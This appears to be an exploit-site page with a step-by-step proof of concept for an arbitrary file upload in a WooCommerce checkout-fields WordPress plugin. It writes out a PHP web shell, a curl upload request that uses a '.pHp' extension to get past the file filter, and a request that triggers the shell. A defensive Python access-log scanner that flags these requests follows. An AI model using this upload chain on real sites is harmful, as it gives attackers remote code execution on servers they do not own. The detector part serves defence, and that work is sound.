## https://sploitus.com/exploit?id=WPEX-ID:4DC72CD2-81D7-4A66-86BD-C9CFAF690EED
1. Install and activate woocommerce (dependency, no setup required)
2. Install and activate the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2)
3. Prepare the payload:

echo '<?php passthru("id"); ?>' > /tmp/payload.php

4. Invoke the following curl command to upload the payload (notice that the name parameter ends in the mixed-case extension ".pHp"):

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp' \
    -F 'file=@/tmp/payload.php'

5. Trigger the payload:

curl -i 'http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php'
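
From the defender's side, the requests in steps 4 and 5 leave recognizable entries in a web server access log. The following added example (not part of the original PoC) flags both; the combined log format, the list of PHP-handled extensions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

UPLOAD_ACTION = "cfom_upload_file"              # AJAX action named in the PoC
UPLOAD_DIR = "/wp-content/uploads/cfom_files/"  # upload directory named in the PoC
# Assumption: extensions your web server may hand to the PHP interpreter.
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Request and status fields of a combined-format access log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def is_php_name(name):
    """Case-insensitive extension check, ignoring trailing dots and spaces."""
    parts = name.rstrip(". ").rsplit(".", 1)
    return len(parts) == 2 and parts[1].lower() in PHP_EXTS

def classify(line):
    """Return a finding tag for one log line, or None."""
    m = REQ_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, query = unquote(url.path), parse_qs(url.query)
    # Upload request whose 'name' parameter carries a PHP extension in any case.
    # Only sees parameters sent in the URL; POST-body parameters need WAF/app logs.
    if path.endswith("/wp-admin/admin-ajax.php") and UPLOAD_ACTION in query.get("action", []):
        if any(is_php_name(n) for n in query.get("name", [])):
            return "upload-with-php-extension"
    # Any request for a PHP file inside the plugin's upload directory.
    if UPLOAD_DIR in path and is_php_name(path.rsplit("/", 1)[-1]):
        return "php-requested-from-upload-dir"
    return None

def scan(lines):
    """Return (line_number, tag) for every suspicious line."""
    return [(n, tag) for n, line in enumerate(lines, 1) if (tag := classify(line))]

# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp HTTP/1.1" 200 57 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/uploads/cfom_files/payload.php HTTP/1.1" 200 54 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=logo.png HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:05:01 +0000] "GET /wp-content/uploads/cfom_files/logo.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, tag in scan(SAMPLE_LOG):
        print(n, tag)
```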